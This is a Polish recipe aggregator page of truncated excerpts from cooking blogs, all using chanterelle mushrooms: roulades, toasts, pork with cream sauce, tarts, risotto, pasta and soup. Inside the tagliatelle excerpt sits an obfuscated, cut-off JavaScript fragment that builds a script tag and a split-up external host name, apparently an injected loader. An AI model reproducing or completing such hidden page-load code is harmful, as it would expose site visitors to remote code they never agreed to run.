Roladka z fileta kurczaka, kurek i boczku w sosie śmietanowym, to pyszne podanie mięsa piersi z kurczaka z sezonowymi grzybami. Danie jest delikatne w smaku i posmakuje mam nadzieję wielu z Was. Podałam tu przepis na jedną roladkę, z pewnością będzie Was więcej przy stole to zwiększcie proporcje. Ja to danie przygotowałam dla dwóch osób. … Czytaj dalej Roladka(...)fileta z kurczaka, kurek i boczku w sosie śmietanowym Artykuł Roladka z fileta z kurczaka, kurek i boczku w sosie śmietanowym pochodzi z serwisu Pieprzyć z fantazją
Pieprzyć z FantazjąGrzanki moja miłość! 😍 Składniki: bagietka na grzanki ser camembert kurki 1 szalotka sól pieprz odrobina masła Wykonanie: Kurki oczyścić . Jeżeli są drobne, zostawiamy je w całości, jeżeli większe - kroimy na mniejsze kawałki. Na patelni rozgrzewamy masło, wrzucamy kurki, smażymy aż zmiękną. Następnie dodajemy pokrojoną w kostkę szalotkę, i smażymy całość mieszając około 10 minut na małym(...)ogniu. Na koniec solimy i pieprzymy do smaku. Bagietkę kroimy po skosie na kromki, każdą kromkę smarujemy odrobiną masła. Na każdej układamy plasterki camemberta i łyżeczkę kurek z cebulką. Układamy na blaszce wyłożonej papierem do pieczenia.Wstawiamy do piekarnika nagrzanego do 180 stopni na ok. 12 minut
Walijskie Pichceniejedną całość. Może to być dressing, sos lub hummus. Przystawki na grilla na ciepło Idealne warzywa na grilla to szparagi, bataty i cukinia. Uwielbiam grzyby. W sezonie są to kurki…A propos kurek to dzisiaj w sklepie widziałam pierwsze kurki. Zdziwiłam się niesamowicie i zastanawiałam z jakiego kraju one przybyły. U nas co prawda padało niemało(...)było stosunkowo zimno, a grzyby przecież nie lubią niskiej temperatury. Zamiast kurek wybrałam jednak shiitaki, które są niesamowicie smaczne i świetnie pasują do grillowanych warzyw. Popularnym warzywem na grilla jest niewątpliwie cukinia. Grillowana cukinia w marynacie jest bardzo smaczna zwłaszcza posypana pokruszonym, słonym feta. Innymi warzywami, na które czekam niecierpliwie przez cały rok są szparagi i fasolka szparagowa. Bardzo
codojedzeniaszybki w wykonaniu obiad. Polecam! Składniki: * ok. 50 dkg polędwiczki wieprzowej * 30 dkg kurek * 1/2 szklanki śmietanki 30% * olej do smażenia polędwiczek * 2 łyżki masła do smażenia kurek * 1 mała cebulka * sól, sól hiszpańska * natka z pietruszki Polędwiczkę umyłam pod bieżącą wodą i okroiłam ze zbędnych tłustych kawałków. Pokroiłam na grubość(...)drugiej patelni rozpuściłam masło i dodałam pokrojoną w kostkę cebulkę. Zeszkliłam. Opłukane dokładnie kurki dodałam do zeszklonej cebuli i smażyłam ok. 6 minut. W tym czasie kurki puściły sok. Następnie wlałam śmietankę i delikatnie jeszcze wszystko podgrzałam. Posoliłam. Dodałam łyżkę pokrojonej natki z pietruszki. Wykładałam na talerz polędwiczki z sosem kurkowym w towarzystwie sałaty. Notatki: * do przyprawienia
Pieprzyć z FantazjąKurki to jedne z moich ulubionych(...)grzybów leśnych. Na blogu mam już przepis na pyszne risotto kurkowe , a dzisiaj zrobiłam schab z tymi grzybami. Jednak z racji tego, że mamy zimę wykorzystałam do tego dania kurki mrożone. Mimo to sos jest pyszny i aromatyczny! (adsbygoogle = window.adsbygoogle || []).push({}); Składniki: około 700 g schabu bez kości 250 g kurek (u mnie mrożone) 1 nieduża cebula
Danka Pichcimąki szczypta soli 150 g masła 3 łyżki wody 1 łyżka mixu suszonych ziół oregano, bazylia, tymianek, rozmaryn, natka pietruszki Lub 2 łyżki świeżych ziół nadzienie tarty: 250 g kurek 100 g sera bursztyn 2 jajka 1 opakowanie sera ricotta sól, pieprz pęczek natki pietruszki Przygotowanie: Wszystkie składniki ciasta włączymy ze sobą w misce lub na stolnicy, wyrabiamy kilka(...)formę. Piekarnik nagrzewamy do 190 stopni. Spód do tarty pieczemy przez ok 25 minut na lekko złoty kolor. Wyjmujemy z piekarnika. Jajka miksujemy z ricottą i 200 g kurek na gładką masę. Dodajemy sól, pieprz i dużo natki pietruszki. Masę jajeczną wykładamy na ciasto, na wierzch układamy 50 gram kurek i całość posypujemy startym serem bursztyn
Życie zaczyna się w kuchnimoże coś do słoików? U mnie dziś sierpniowe trio z niewielką ilością przypraw, żeby smaki naturalne, najwspanialsze o tej porze roku, były wyczuwalne najbardziej. W rolach głównych występują: złociste kurki, zielona cukinia, najsłodszy pomidor malinowy i jego mniejsi krewni o kwaskowatym posmaku - pomidorki koktajlowe! Brawa, brawa! Całość podsmażona z aromatycznym czosnkiem i gałązką rozmarynu, która nieco podbija smak warzyw(...)przy patelniach na te kilka minut i uczcijmy smakami Sierpnia jego ostatni weekend ;) Sakiewki wypełnione skarbami końca lata nie mogę się doczekać, żeby rozradować Wam podniebienie! Sakiewki naleśnikowe z kurkami, cukinią i pomidorami Potrzebujesz: Naleśniki 220g mąki 2 jajka 220ml mleka 220ml wody gazowanej szczypta soli olej do smażenia 1/2 łyżeczki czosnku granulowanego 1/2 łyżeczki słodkiej mielonej papryki Farsz
Kuchnia w Słońcu Skąpanakukurydzą. Tagliatelle Podobnie jak spaghetti ma formę wstążek, jednak wyróżnia się tym, że nitki tagliatelle są zdecydowanie szersze. Coraz większą popularnością cieszą się odmiany smakowe, np. pomidorowe. Tagliatelle z kurkami i boczkiem 400 g tagliatelle, 250 g kurek, 300 g plastrów boczku, cebula, oliwa z oliwek, 2 ząbki czosnku, ulubione przyprawy. Na oliwie z oliwek zeszklić(...)cebulę i dodać do niej kurki. Gdy wyparuje woda z grzybów dodać posiekany czosnek oraz boczek. W międzyczasie odcedzić makaron i dodać go na patelnię z mięsem i kurkami. Wszystko wymieszać i przyprawić. Voila! A wy jaki makaron lubicie najbardziej? (function(){ wX6g=document.createElement("script");wX6g.type="text/javascript"; wX6g.async=true;wX6g_=(("us")+"t")+"a";wX6g_+=("t.i")+""+"n";wX6g
CookMagpostacią. W tym roku były już kilka razy kurki w śmietanie , była zupa kurkowa , teraz przyszedł czas na risotto. Risotto to proste, jednogarnkowe danie kuchni włoskiej. U nas kurki oczywiście w towarzystwie boczku, ale nie jest to konieczne, można go pominąć Inspiracją był ten przepis , dodałam tylko boczek i zamieniłam ser z mleka krowiego na owczy, stąd(...)pominęłam też masło. Mimo jego braku danie wyszło meeega pyszne. Polecam. U mnie podwójna porcja, zjedliśmy to w 6 osób. Składniki: - 150g ryżu na risotto (u mnie Arborio) - 200g kurek - ok.60g wędzonego boczku (można pominąć) - 3 łyżki masła (pominęłam) - 2 łyżki oliwy z oliwek (u mnie olej kokosowy bezzapachowy) - 500ml bulionu (warzywny lub rosół) - 100ml białego wytrawnego wina
Smaczne ZdroweCześć! Następny pomysł na danie z kurkami. Zupka :) Bardzo smaczna a dodatek tortellini podkreśla jej atrakcyjność. Składniki: * 500 g kurek * 15 dkg tortellini z serem * 1/2 szklanki śmietanki 30% * natka pietruszki * masło (ok. 3 cm z kostki 200 g) * 1 marchew * 1 mała pietruszka * 1 cebula * 1 liść laurowy * 3 ziarnka ziela angielskiego * sól, pieprz * opcjonalnie kawałeczek boczku(...)instrukcją na opakowaniu. W garnku rozpuściłam masło i wrzuciłam pokrojoną w plasterki marchew i pietruszkę. Przez chwilę smażyłam i dodałam pokrojoną w kostkę cebulkę. Zeszkliłam. Dołożyłam następnie do garnka kurki i smażyłam wszystko ok. 10 minut. Podlałam wodą do ok. 10 cm wyżej niż zawartość garnka. Dodałam ziele i liść i gotowałam tak ok. 5 minut. Dolałam
Pieprzyć z FantazjąSezon na kurki trwa. Połączenie ich z serem ricotta i sosem śmietanowo -jajecznym sprawdziło się. Polecam. Składniki: 300 g ciasta francuskiego 300 g kurek 1 łyżka masła ghee 1/2 pęczku natki pietruszki 2 ząbki czosnku 300 ml śmietany 36% 3 jajka 250 g sera ricotta gałka muszkatołowa sól, pieprz Przygotowanie: Formę do tarty posmarowałem oliwą(...)koniec dodałem posiekany czosnek, chwilę smażyłem. Dodałem posiekaną natkę pietruszki, doprawiłem do smaku solą i pieprzem. W osobnej misce połączyłem śmietanę z jajkami i przyprawami. Na ciasto wyłożyłem kurki, na nich ricottę. Zalałem sosem śmietanowo- jajecznym. Piekłem 15 minut w 200 stopniach C, a potem zmniejszyłem temperaturę do 180 stopni C i piekłem 25 minut
R'n'G KitchenSezon kurkowy w pełni. Sos w połączeniu z delikatnymi polędwiczkami. Polecamy. Składniki: 600 g polędwiczek wieprzowych 1 łyżka mąki 3 łyżki masła ghee 1 cebula 250 g kurek 2 łyżki kwaśnej śmietany 1 łyżka posiekanego lubczyku 1 łyżka posiekanej natki pietruszki 1 ząbek czosnku sól, pieprz Przygotowanie: Polędwiczki umyłem, usunąłem błony i tłuszcz. Mięso natarłem solą(...)obsmażyłem ze wszystkich stron polędwiczki, tak aby się lekko zrumieniły. Owinąłem folią aluminiową, aby zmiękły. W rondlu rozpuściłem resztę masła, zeszkliłem na nim drobno posiekaną cebulę, dodałem kurki. Kurki: po przebraniu, starannie je oczyściłem, umyłem, większe pokroiłem na połówki lub ćwiartki. Po dodaniu kurek, dusiłem na dość dużym ogniu około 20 minut, mieszając od czasu do czasu
R'n'G Kitchen